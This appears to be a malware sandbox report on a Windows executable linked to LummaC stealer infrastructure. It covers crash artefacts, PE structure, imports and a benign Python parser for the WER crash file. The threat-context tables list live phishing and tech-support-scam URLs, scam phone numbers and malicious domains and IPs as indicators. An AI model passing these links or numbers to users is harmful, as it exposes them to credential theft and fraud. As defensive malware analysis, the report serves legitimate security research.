• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
01:59:52 | API Interceptor | 8x Sleep call for process: o7b91j8vnJ.exe modified
02:00:12 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
IP context: 172.67.163.209
Associated Sample Name / URL | Detection | Threat Name
asbpKOngY0.exe | malicious | LummaC
file.exe | malicious | LummaC

Domain context: strollheavengwu.shop
Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)
http://myidealwedding.com.au | malicious | BitRAT, HTMLPhisher | 104.21.15.198
iPUk65i3yI.exe | malicious | LummaC | 104.21.15.198
asbpKOngY0.exe | malicious | LummaC | 172.67.163.209
2FjvjcayaH.exe | malicious | LummaC | 104.21.15.198
qrLdMv1QXG.exe | malicious | LummaC | 104.21.15.198
file.exe | malicious | LummaC | 172.67.163.209
LwnI84BBtb.exe | malicious | LummaC | 104.21.15.198
file.exe | malicious | LummaC | 104.21.15.198

ASN context: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.html | malicious | HTMLPhisher | 172.64.151.101
https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.com | malicious | TechSupportScam | 104.21.53.38
https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238 | malicious | Phisher | 104.21.80.104
https://windowdefalerts-error0x21702-alert-virus-detected.pages.dev/ | malicious | HTMLPhisher, TechSupportScam | 172.66.44.98
https://windowdefalerts-error0x21701-alert-virus-detected.pages.dev/ | malicious | HTMLPhisher, TechSupportScam | 104.21.56.41
https://www.google.com.np/amp/s/www.google.com%2Furl%3Fsa%3DD%26q%3Dhttps%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fmy-awesome-project-id-35889.appspot.com%2Fo%2Fsos.html%253Falt%253Dmedia%2526token%253D8c2f5cb7-624d-469a-a987-a3c9e3bcaf1c%26ust%3D1714080900000000%26usg%3DAOvVaw34yUu7IQGPgWBmXhCFwzfl%26hl%3Den%26source%3Dgmail#Z2xlbm5Ab2JzaWRpYW5zZWN1cml0eS5jb20= | malicious | HTMLPhisher | 104.17.2.184
https://ppo46-secondary.z8.web.core.windows.net/werrx01USAHTML/?bcda=1-833-293-0124 | malicious | TechSupportScam | 172.67.208.186
https://zzv4-secondary.z13.web.core.windows.net/werrx01USAHTML/?bcda=1-833-693-8251 | malicious | TechSupportScam | 172.67.208.186
https://apppbx07.z13.web.core.windows.net/Win0security-helpline07/index.html?ph0n=+1-000-000-0000 | malicious | TechSupportScam | 104.21.53.38
https://pub-839300a9c6054ed7b1c425122a9dd984.r2.dev/doc.html | malicious | HTMLPhisher | 104.18.2.35

JA3 fingerprint context: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
SHEOrder-10524.exe | malicious | Remcos, DBatLoader | 172.67.163.209
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 172.67.163.209
https://56hytuti5.weebly.com/ | malicious | Unknown | 172.67.163.209
udVh4Ist4Z.exe | malicious | Remcos, DBatLoader | 172.67.163.209
samradapps_datepicker_221114.xlam | malicious | Unknown | 172.67.163.209
Enquiry 230424.bat | malicious | Remcos, DBatLoader | 172.67.163.209
URGENTE_NOTIFICATION.cmd | malicious | Remcos, DBatLoader | 172.67.163.209
fu56fbrtn8.exe | malicious | Remcos, DBatLoader | 172.67.163.209
Payment MT103.xls | malicious | Unknown | 172.67.163.209
Ref_Order04.xls | malicious | Unknown | 172.67.163.209

Dropped file context: No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9934271082223628
Encrypted: false
SSDEEP: 96:e4UX7ElusHhqPxF7qPcfAQXIDcQF8c6icE1cw3CPQ+HbHg/wWGTf3hOycISWLTvw:wAluB6s078m/MjsKFPzuiFTZ24IO83
MD5: 09766CAD2C8252329B0C0E6A261576E3
SHA1: D44ACD4CE846308E24626D2F15AF3138B0187745
SHA-256: 4B92D03D72B18F6F94B41E9B4D913E63DCAD6EB5ABEBB2132203847739E8F3A1
SHA-512: 90FC458D14D5F1A85CB468FF8728D9F7402058963E431B1EBE07D466AEE229E41D435295577C50064653444DDD1929D5222999BDBBDBF60F8528B5682A69E54D
Malicious: false
Reputation: low
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.4.7.6.8.0.0.4.6.7.8.6.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.4.7.6.8.0.0.8.7.4.1.0.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.7.b.b.6.1.5.-.5.d.5.0.-.4.f.8.c.-.b.0.9.2.-.f.c.d.3.9.0.f.7.c.c.e.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.7.b.3.c.9.f.-.4.5.f.e.-.4.8.5.0.-.b.6.2.4.-.4.f.f.3.7.c.2.1.0.1.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.7.b.9.1.j.8.v.n.J...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.c.8.-.0.0.0.1.-.0.0.1.4.-.e.1.6.a.-.9.5.7.e.a.3.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.b.e.8.2.9.7.2.0.a.9.0.b.8.d.6.0.f.b.6.e.6.a.7.8.4.4.e.9.2.3.0.0.0.0.f.f.f.f.!.0.0.0.0.3.d.1.2.e.7.b.f.8.7.c.e.0.3.f.e.4.c.5.9.c.5.1.2.7.e.2.2.5.d.f.d.3.7.b.7.a.5.3.0.!.o.7.b.9.1.j.8.v.n.J...e.x.e.....T.a.r.g.e.t.A.p.p.
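The preview above is UTF-16LE text with a byte order mark, which is why every character is followed by a dot (the null high byte) and the first two bytes render as "..". As an added example, not part of the Joe Sandbox report, the following Python rebuilds the fields visible in the preview as a local byte string, decodes them, converts EventTime from FILETIME, names the Wow64Host/Wow64Guest machine codes, and pulls the crashed binary's SHA1 out of TargetAppId, whose second "!"-delimited segment is "0000" followed by the file's SHA1 (the value here is the sample's own hash, as the report summary shows). The byte string is constructed from the preview, not read from the sandbox, and the preview is truncated after TargetAppId, so later fields are not reproduced.

```python
from __future__ import annotations

import re
from datetime import datetime, timedelta, timezone

# Constructed Report.wer content: the key=value pairs visible in the UTF-16
# preview of the WerFault drop in this report, rebuilt locally as bytes.
_FIELDS = [
    ("Version", "1"),
    ("EventType", "APPCRASH"),
    ("EventTime", "133584768004678633"),
    ("ReportType", "2"),
    ("Consent", "1"),
    ("UploadTime", "133584768008741072"),
    ("ReportStatus", "655456"),
    ("ReportIdentifier", "887bb615-5d50-4f8c-b092-fcd390f7cce2"),
    ("IntegratorReportIdentifier", "4d7b3c9f-45fe-4850-b624-4ff37c210144"),
    ("Wow64Host", "34404"),
    ("Wow64Guest", "332"),
    ("NsAppName", "o7b91j8vnJ.exe"),
    ("AppSessionGuid", "00001ac8-0001-0014-e16a-957ea396da01"),
    ("TargetAppId", "W:0006cdbe829720a90b8d60fb6e6a7844e9230000ffff"
                    "!00003d12e7bf87ce03fe4c59c5127e225dfd37b7a530!o7b91j8vnJ.exe"),
]
SAMPLE_WER = b"\xff\xfe" + "".join(f"{k}={v}\r\n" for k, v in _FIELDS).encode("utf-16-le")

# IMAGE_FILE_MACHINE_* constants; Wow64Host/Wow64Guest carry these in decimal
# (34404 = 0x8664 AMD64 host, 332 = 0x14c i386 guest: a 32-bit sample under WOW64).
MACHINE_NAMES = {0x14C: "i386", 0x8664: "AMD64", 0xAA64: "ARM64"}

_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_wer(data: bytes) -> dict[str, str]:
    """Decode a Report.wer blob: UTF-16LE with BOM, CRLF-separated key=value lines."""
    if not data.startswith(b"\xff\xfe"):
        raise ValueError("Report.wer should start with a UTF-16LE byte order mark")
    fields: dict[str, str] = {}
    for line in data.decode("utf-16").splitlines():  # the utf-16 codec consumes the BOM
        key, sep, value = line.partition("=")
        if sep:
            fields[key] = value
    return fields


def filetime_to_datetime(filetime: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return _EPOCH_1601 + timedelta(microseconds=filetime // 10)


def sha1_from_target_app_id(app_id: str) -> str | None:
    """Extract the crashed binary's SHA1 from a WER TargetAppId.

    Layout seen here: W:<app key>!0000<sha1>!<file name>. The second segment is
    the file SHA1 with a 0000 prefix; any other shape returns None.
    """
    parts = app_id.split("!")
    if len(parts) < 3:
        return None
    m = re.fullmatch(r"0000([0-9a-fA-F]{40})", parts[1])
    return m.group(1).lower() if m else None


def summarize(data: bytes) -> dict:
    """The triage facts an analyst wants from a Report.wer left behind by WerFault."""
    f = parse_wer(data)
    return {
        "app": f.get("NsAppName"),
        "event": f.get("EventType"),
        "when_utc": filetime_to_datetime(int(f["EventTime"])),
        "host_arch": MACHINE_NAMES.get(int(f["Wow64Host"]), "unknown"),
        "guest_arch": MACHINE_NAMES.get(int(f["Wow64Guest"]), "unknown"),
        "sha1": sha1_from_target_app_id(f.get("TargetAppId", "")),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_WER).items():
        print(f"{key:>10}: {value}")
```

The decoded EventTime lands at 2024-04-25 00:00:00 UTC, which agrees with the minidump timestamp in the next record and with the 02:00:12 (+02:00) WerFault entry in the API interceptor table, so the two WerFault drops are the crash of this sample and not of an unrelated process.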
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 15 streams, Thu Apr 25 00:00:00 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):52446
                                                  Entropy (8bit):2.8165147753445083
                                                  Encrypted:false
                                                  SSDEEP:192:3wsX4UDvycwqOcO7BKdrRZa8MwkV/iUkgomcc3E413zwKA7gDnN:glKv1y7BKbw7B/xkgzu4tzhA7gR
                                                  MD5:A81AF11FDFEAAD7BB87F6E9109731741
                                                  SHA1:FAA640E4F1A8D3446EA9E72A2973C6269DBDCE2D
                                                  SHA-256:7B6CF8032FBC0359C65F0E2DA438E0FA2BD4A6CC603897A53FBAD8C13AF27775
                                                  SHA-512:A225E97E14B458BA47C2D1570E9FF774B4F85800D2643CFAEEAD30D067F4AC34CD85B73CF91B5AA763CCEFFD1FBC997B8441F785F2353622C1A7C1E6E9586A24
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:MDMP..a..... .........)f............4...............H........................1..........`.......8...........T...........x=..f...........x ..........d"..............................................................................eJ......."......GenuineIntel............T.............)f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8328
                                                  Entropy (8bit):3.700687069618279
                                                  Encrypted:false
                                                  SSDEEP:192:R6l7wVeJml6W6Y9/SU9/qsKgmf7NWWpDG89b1psffnm:R6lXJk6W6Y1SU9yhgmf7NWk1Cfu
                                                  MD5:6FCE49AF3704AC1CC785D82A04014867
                                                  SHA1:0038071B439E7D05B6C90BEB60A5B7F35372C321
                                                  SHA-256:46A6DB5EBB541F357C1AFB9F1E4E7A3A440D8A17E7E9A1801004636656D5759B
                                                  SHA-512:138B77F5FF98348D89DBF56907782FA8A670E680B1C712A5939D7C3C2E25A386555367C4893BEF407F0EE741D78E13B8A15ABD150A33E5342EDD8DCB2AC8E63A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.5.6.<./.P.i.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4579
                                                  Entropy (8bit):4.4601599494161555
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zscuJg77aI9/EWpW8VYIYm8M4J19F1z+q8KnYdPrkd:uIjfDI7Nd7VEJbnYFrkd
                                                  MD5:B892C93A6E619EF4D62C8618317AF652
                                                  SHA1:DE149DAC8EB92F0B7AC6E9CB6168CFCC56986D20
                                                  SHA-256:556D43615A49FD9BFC3ED902838B108E0356F80F1813A42CFE618AD6C8CB3893
                                                  SHA-512:5845814C362C1CC78B5A9BC47D55856A671A5B927F3C46494E250D1A36CD97858D1B473F1D1947A564B0D8A310C82FC40F49515DBD4B8A66719292BB1182C23E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="294662" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.4654601505258285
                                                  Encrypted:false
                                                  SSDEEP:6144:cIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbB:hXD94+WlLZMM6YFHw+B
                                                  MD5:3D4D4217710C749D6E4D2323B104242F
                                                  SHA1:E931F9E41EEA0C9A81A8C3A024EDE256E0A3D70B
                                                  SHA-256:004F9FDF8727A998FEF89CA68D4D01E2830963B106066925A8630BF30EDC3738
                                                  SHA-512:88C984B4AAE0DC3E65D2780CBF712C472C13D5068AC46364DCB916A577155AAF2458379C139882F7D1E870E5F622837CDF10DC81A6EF220B716631EF20045427
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..B...................................................................................................................................................................................................................................................................................................................................................T.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.142245208908651
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:o7b91j8vnJ.exe
                                                  File size:360'960 bytes
                                                  MD5:7b3e62bcbeed62a180220669f6a0c548
                                                  SHA1:3d12e7bf87ce03fe4c59c5127e225dfd37b7a530
                                                  SHA256:32cad0a627c9f3bf1172d0fc11a5492b2ff20e3e5509f53e0ac83e87d15f2a5d
                                                  SHA512:fe3456aecbfa5609623e616eaaaa8eec07b69ab5447f91358afa274e5c197e4e6784dce97822e7d4f3d5e695902fc25ceebb83d988da0afe552597d8821fce7f
                                                  SSDEEP:6144:NFWphCWXvIcpTGjr9wOgl3Oi3uBa0RwR9ZW2GCEdEL4tRDs:vWphFfANFgl3Pt0+R91cdELuRDs
                                                  TLSH:0974F01972D1C0B1E473DA361979ABA1062FFCB299718E57334C364E0D315D0AB3ABA7
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.................O.......p.v.....q.$...............e....su.......K......sN.....Rich....................PE..L...?U.c...........
                                                  Icon Hash:4b255149654d410d
                                                  Entrypoint:0x40416c
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x63B0553F [Sat Dec 31 15:29:03 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:7dd08063ba15d7295e29dcfabb5e9889
                                                  Instruction
                                                  call 00007FF264D41EDFh
                                                  jmp 00007FF264D3CAE5h
                                                  push 00000014h
                                                  push 00417038h
                                                  call 00007FF264D3EF43h
                                                  call 00007FF264D420B0h
                                                  movzx esi, ax
                                                  push 00000002h
                                                  call 00007FF264D41E72h
                                                  pop ecx
                                                  mov eax, 00005A4Dh
                                                  cmp word ptr [00400000h], ax
                                                  je 00007FF264D3CAE6h
                                                  xor ebx, ebx
                                                  jmp 00007FF264D3CB15h
                                                  mov eax, dword ptr [0040003Ch]
                                                  cmp dword ptr [eax+00400000h], 00004550h
                                                  jne 00007FF264D3CACDh
                                                  mov ecx, 0000010Bh
                                                  cmp word ptr [eax+00400018h], cx
                                                  jne 00007FF264D3CABFh
                                                  xor ebx, ebx
                                                  cmp dword ptr [eax+00400074h], 0Eh
                                                  jbe 00007FF264D3CAEBh
                                                  cmp dword ptr [eax+004000E8h], ebx
                                                  setne bl
                                                  mov dword ptr [ebp-1Ch], ebx
                                                  call 00007FF264D3E178h
                                                  test eax, eax
                                                  jne 00007FF264D3CAEAh
                                                  push 0000001Ch
                                                  call 00007FF264D3CBC1h
                                                  pop ecx
                                                  call 00007FF264D41A70h
                                                  test eax, eax
                                                  jne 00007FF264D3CAEAh
                                                  push 00000010h
                                                  call 00007FF264D3CBB0h
                                                  pop ecx
                                                  call 00007FF264D41EEBh
                                                  and dword ptr [ebp-04h], 00000000h
                                                  call 00007FF264D3FF84h
                                                  test eax, eax
                                                  jns 00007FF264D3CAEAh
                                                  push 0000001Bh
                                                  call 00007FF264D3CB96h
                                                  pop ecx
                                                  call dword ptr [004110B0h]
                                                  mov dword ptr [04037EC4h], eax
                                                  call 00007FF264D41F06h
                                                  mov dword ptr [0044A42Ch], eax
                                                  call 00007FF264D41AC3h
                                                  test eax, eax
                                                  jns 00007FF264D3CAEAh
                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17444 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c38000 | 0xd7b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3c46000 | 0x1360 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x111f0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x16968 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x11000 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xfd95 | 0xfe00 | 365546d68981e366f6b9cf5485563051 | False | 0.6054995078740157 | data | 6.708569599816657 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x11000 | 0x6cd6 | 0x6e00 | 26624ee46364d168c3e5277e233a1467 | False | 0.389453125 | data | 4.7388444549239 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x18000 | 0x3c1fec8 | 0x32600 | 5ed17408e1eeab96febd5e93f53c97e6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c38000 | 0xd7b8 | 0xd800 | 902e0d7792120bfbda96c4d0c7972c65 | False | 0.5134186921296297 | data | 5.461355913258432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3c46000 | 0x1360 | 0x1400 | a0c45b25d29a60da6243876bf6dbab61 | False | 0.76640625 | data | 6.489757211193242 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
AFX_DIALOG_LAYOUT | 0x3c44e38 | 0xe | data | | | 1.5714285714285714
RT_ICON | 0x3c384a0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.5660980810234542
RT_ICON | 0x3c39348 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.5505415162454874
RT_ICON | 0x3c39bf0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.6192196531791907
RT_ICON | 0x3c3a158 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.462448132780083
RT_ICON | 0x3c3c700 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.4861632270168856
RT_ICON | 0x3c3d7a8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Romanian | Romania | 0.4971311475409836
RT_ICON | 0x3c3e130 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.4530141843971631
RT_ICON | 0x3c3e600 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.42217484008528783
RT_ICON | 0x3c3f4a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.47879061371841153
RT_ICON | 0x3c3fd50 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Romanian | Romania | 0.5806451612903226
RT_ICON | 0x3c40418 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.48627167630057805
RT_ICON | 0x3c40980 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.46939834024896265
RT_ICON | 0x3c42f28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.4842870544090056
RT_ICON | 0x3c43fd0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Romanian | Romania | 0.5016393442622951
RT_ICON | 0x3c44958 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.5531914893617021
RT_STRING | 0x3c45080 | 0x49a | data | Romanian | Romania | 0.45161290322580644
RT_STRING | 0x3c45520 | 0x292 | data | Romanian | Romania | 0.49240121580547114
RT_GROUP_ICON | 0x3c3e598 | 0x68 | data | Romanian | Romania | 0.6923076923076923
RT_GROUP_ICON | 0x3c44dc0 | 0x76 | data | Romanian | Romania | 0.6779661016949152
RT_VERSION | 0x3c44e48 | 0x238 | data | | | 0.5299295774647887
DLL | Import
KERNEL32.dll | GetSystemDefaultLangID, GlobalMemoryStatus, GetLocaleInfoA, FindResourceExW, LocalCompact, InterlockedDecrement, GetComputerNameW, CreateHardLinkA, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsW, GetUserDefaultLangID, SetCommState, GlobalAlloc, LoadLibraryW, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, RemoveDirectoryA, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, GetExitCodeThread, AddAtomW, GlobalFindAtomW, GetOEMCP, LoadLibraryExA, VirtualProtect, SetCalendarInfoA, GetConsoleProcessList, GetTempPathA, GetVolumeInformationW, HeapAlloc, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, HeapFree, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, OutputDebugStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, LCMapStringW, GetStringTypeW, CreateFileW
Language of compilation system | Country where language is spoken | Map
Romanian | Romania |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
